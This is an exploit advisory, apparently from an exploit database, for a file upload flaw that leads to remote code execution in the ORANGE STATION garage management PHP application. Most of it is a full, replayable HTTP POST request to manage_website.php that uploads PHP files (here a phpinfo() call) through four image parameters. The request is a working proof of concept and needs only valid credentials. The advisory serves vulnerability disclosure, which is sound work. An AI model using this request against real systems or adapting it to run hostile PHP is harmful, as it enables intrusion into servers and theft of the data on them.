## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 03/26/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html ## Reference: https://portswigger.net/web-security/file-upload, https://www.bugcrowd.com/glossary/remote-code-execution-rce/ ## Description: The parameters back_login_image, login_image, invoice_image, and website_image in the manage_website.php application are vulnerable for File Upload and the server is vulnerable for Remote code execution after this. The attacker who has credentials to this system can upload any PHP file and he can destroy the system or he can steal a very sensitive information. STATUS: HIGH-CRITICAL Vulnerability ## Exploit: ```POST POST /garage/garage/manage_website.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n Content-Length: 1871 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/garage/garage/manage_website.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Connection: close ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="title" Orange Station ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="footer" Admin Panel ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="short_title" 9090909090 ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="currency_code" Shivaji Nagar, Nashik ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="currency_symbol" ₹ ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_website_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="website_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_invoice_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="invoice_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_login_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="login_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_back_login_image" service.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="back_login_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="btn_web" ------WebKitFormBoundaryytBZTydZ8OfOJjda-- ``` ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html) ## Time spent: 00:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |